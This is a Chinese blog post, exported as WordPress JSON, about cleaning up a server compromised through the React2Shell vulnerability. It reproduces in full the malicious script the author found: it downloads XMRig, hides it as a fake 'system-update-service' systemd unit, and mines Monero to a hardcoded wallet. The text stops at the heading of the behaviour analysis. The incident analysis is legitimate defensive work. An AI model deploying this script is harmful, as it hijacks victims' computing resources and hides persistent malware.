{"id":6530,"date":"2025-12-26T11:50:54","date_gmt":"2025-12-26T03:50:54","guid":{"rendered":"https:\/\/dingxuan.info\/wp\/?p=6530"},"modified":"2025-12-26T11:50:54","modified_gmt":"2025-12-26T03:50:54","slug":"%e4%bf%ae%e5%a4%8dreact2shell%e6%bc%8f%e6%b4%9e%e5%af%bc%e8%87%b4%e6%9c%8d%e5%8a%a1%e5%99%a8%e6%9d%83%e9%99%90%e6%b3%84%e9%9c%b2-%e4%b9%8b%e4%b8%80","status":"publish","type":"post","link":"https:\/\/dingxuan.info\/wp\/?p=6530","title":{"rendered":"\u4fee\u590dReact2Shell\u6f0f\u6d1e\u5bfc\u81f4\u670d\u52a1\u5668\u6743\u9650\u6cc4\u9732 \u4e4b\u4e00"},"content":{"rendered":"

\u72b6\u51b5\u4e0e\u8fd9\u4e2a\u76f8\u540c\uff1a\nhttps:\/\/www.huntress.com\/blog\/peerblight-linux-backdoor-exploits-react2shell<\/a>\n\u5728\u4e0d\u80fd\u9a6c\u4e0a\u91cd\u88c5\u7cfb\u7edf\u65f6\uff0c\u68c0\u67e5\u548c\u4e34\u65f6\u4fee\u590d\u7684\u8bb0\u5f55\u5982\u4e0b<\/p>\n

\u4e00. \u53d1\u73b0\u6076\u610f\u811a\u672c<\/h2>\n

\u53d1\u73b0CPU\u5360\u7528\u8fc7\u9ad8\uff0c\u627e\u5230\u6076\u610f\u811a\u672c<\/p>\n\n

#!\/bin\/bash\n\n# Configuration\nTAR_FILE="kal.tar.gz"\nEXTRACT_DIR="xmrig-6.24.0"\nSERVICE_NAME="system-update-service"\nARGS="--url pool.supportxmr.com:8080 --user 85UXW36JS78ZzZUw4XRJ1mHEsMAc6vHr2hBU7rvRv9y44Uk4Vo9fyq6LFDuckHZb2HTZpcYYaDdd73jS1oywAndGJxmKP9X --pass test --donate-level 0"\nSERVICE_FILE="\/etc\/systemd\/system\/${SERVICE_NAME}.service"\n\n# Determine binary path based on privileges\nif [ "$(id -u)" -eq 0 ]; then\n    INSTALL_DIR="\/usr\/share\/updater"\n    CONFIG_FILE="$INSTALL_DIR\/miner.conf"\nelse\n    INSTALL_DIR="$(pwd)"\n    CONFIG_FILE="$(pwd)\/miner.conf"\nfi\n\nBINARY_PATH="$INSTALL_DIR\/$EXTRACT_DIR\/xmrig"\n\n# Function to create\/update configuration file\nsave_config() {\n    cat > "$CONFIG_FILE" <<EOF\nBINARY_PATH=$BINARY_PATH\nARGS=$ARGS\nSERVICE_NAME=$SERVICE_NAME\nEOF\n    echo "[*] Configuration saved to $CONFIG_FILE"\n}\n\n# Function to load configuration\nload_config() {\n    if [ -f "$CONFIG_FILE" ]; then\n        source "$CONFIG_FILE"\n        echo "[*] Configuration loaded from $CONFIG_FILE"\n    fi\n}\n\n# First, check if root and move existing installation from pwd to \/usr\/share\/updater\nif [ "$(id -u)" -eq 0 ] && [ -d "$(pwd)\/$EXTRACT_DIR" ] && [ ! -d "$INSTALL_DIR\/$EXTRACT_DIR" ]; then\n    echo "[*] Found existing installation in $(pwd). Moving to $INSTALL_DIR..."\n    mkdir -p "$INSTALL_DIR"\n    mv "$(pwd)\/$EXTRACT_DIR" "$INSTALL_DIR\/" 2>\/dev\/null || true\n    if [ -f "$(pwd)\/$TAR_FILE" ]; then\n        rm -f "$(pwd)\/$TAR_FILE"\n    fi\n    if [ -f "$(pwd)\/miner.conf" ]; then\n        mv "$(pwd)\/miner.conf" "$INSTALL_DIR\/miner.conf" 2>\/dev\/null || true\n    fi\nfi\n\n# Check if already installed\nALREADY_INSTALLED=0\nif [ -f "$BINARY_PATH" ]; then\n    ALREADY_INSTALLED=1\n    echo "[*] Installation detected. Loading existing configuration..."\n    load_config\nfi\n\n# Download and setup if not already present\nif [ ! -f "$BINARY_PATH" ]; then\n    echo "[*] Downloading xmrig..."\n    \n    # Extract in temp location first\n    TEMP_DIR=$(mktemp -d)\n    cd "$TEMP_DIR"\n    \n    curl -L -o "$TAR_FILE" --user-agent "Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36" https:\/\/github.com\/xmrig\/xmrig\/releases\/download\/v6.24.0\/xmrig-6.24.0-linux-static-x64.tar.gz\n    echo "[*] Extracting archive..."\n    tar xvzf "$TAR_FILE"\n    \n    # Move to install directory if root\n    if [ "$(id -u)" -eq 0 ]; then\n        echo "[*] Moving to $INSTALL_DIR..."\n        mkdir -p "$INSTALL_DIR"\n        mv "$EXTRACT_DIR" "$INSTALL_DIR\/"\n    else\n        # For non-root, move to current directory\n        cd - > \/dev\/null\n        mv "$TEMP_DIR\/$EXTRACT_DIR" "$(pwd)\/$EXTRACT_DIR"\n    fi\n    \n    rm -rf "$TEMP_DIR"\n    save_config\nelse\n    echo "[*] Binary already exists at $BINARY_PATH"\nfi\n\nchmod +x "$BINARY_PATH"\n\n# If already installed, update systemd service if it exists\nif [ $ALREADY_INSTALLED -eq 1 ]; then\n    echo "[*] Updating existing installation..."\n    \n    # Check if service exists and update it\n    if [ -f "$SERVICE_FILE" ]; then\n        echo "[*] Found existing systemd service. Updating..."\n        \n        # Stop the service before updating\n        if systemctl is-active --quiet "$SERVICE_NAME"; then\n            echo "[*] Stopping service..."\n            systemctl stop "$SERVICE_NAME"\n        fi\n        \n        # Update service with new arguments\n        cat <<EOF > "$SERVICE_FILE"\n[Unit]\nDescription=System Update Service\nAfter=network.target\n\n[Service]\nType=simple\nExecStart=${BINARY_PATH} ${ARGS}\nRestart=always\nRestartSec=10\nUser=root\n\n[Install]\nWantedBy=multi-user.target\nEOF\n        \n        systemctl daemon-reload\n        echo "[*] Service configuration updated"\n        \n        # Restart the service\n        systemctl start "$SERVICE_NAME"\n        \n        if systemctl is-active --quiet "$SERVICE_NAME"; then\n            echo "[+] Service restarted successfully"\n        fi\n    else\n        # Service doesn't exist yet, continue with normal installation\n        echo "[*] No systemd service found. Proceeding with initial setup..."\n        ALREADY_INSTALLED=0\n    fi\nfi\n\n# Attempt systemd setup (for new installations)\nif [ $ALREADY_INSTALLED -eq 0 ]; then\n    INSTALLED_SYSTEMD=0\n    if [ "$(id -u)" -eq 0 ] && command -v systemctl >\/dev\/null 2>&1; then\n        echo "[*] Root privileges detected. Attempting systemd setup..."\n        \n        cat <<EOF > "$SERVICE_FILE"\n[Unit]\nDescription=System Update Service\nAfter=network.target\n\n[Service]\nType=simple\nExecStart=${BINARY_PATH} ${ARGS}\nRestart=always\nRestartSec=10\nUser=root\n\n[Install]\nWantedBy=multi-user.target\nEOF\n\n        systemctl daemon-reload\n        systemctl enable "$SERVICE_NAME"\n        systemctl start "$SERVICE_NAME"\n        \n        if systemctl is-active --quiet "$SERVICE_NAME"; then\n            echo "[+] Service started via systemd."\n            INSTALLED_SYSTEMD=1\n            save_config\n        fi\n    fi\n\n    # Fallback to nohup\n    if [ $INSTALLED_SYSTEMD -eq 0 ]; then\n        echo "[*] Starting with nohup..."\n        nohup "$BINARY_PATH" $ARGS >\/dev\/null 2>&1 &\n        save_config\n    fi\nfi\n<\/code><\/pre>\n
\u8fd9\u4e2a\u811a\u672c\u4f1a\u5728\u670d\u52a1\u5668\u4e0a\u5b89\u88c5\u5e76\u8fd0\u884c XMRig<\/strong>\uff08\u4e00\u79cd\u5e38\u89c1\u7684\u95e8\u7f57\u5e01\/Monero \u6316\u77ff\u8f6f\u4ef6\uff09\uff0c\u5e76\u8bd5\u56fe\u901a\u8fc7\u4f2a\u88c5\u6210\u7cfb\u7edf\u670d\u52a1\u6765\u9690\u85cf\u81ea\u5df1\u3002<\/p>\n
\u4ee5\u4e0b\u662f\u8be5\u811a\u672c\u5bf9\u4f60\u7cfb\u7edf\u7684\u5177\u4f53\u5f71\u54cd\u5206\u6790\uff0c\u4ee5\u53ca\u5f7b\u5e95\u6e05\u9664\u5b83\u7684\u6b65\u9aa4\u3002<\/p>\n
1.1. \u811a\u672c\u884c\u4e3a\u5206\u6790 (\u5b83\u505a\u4e86\u4ec0\u4e48\uff1f)<\/h3>\n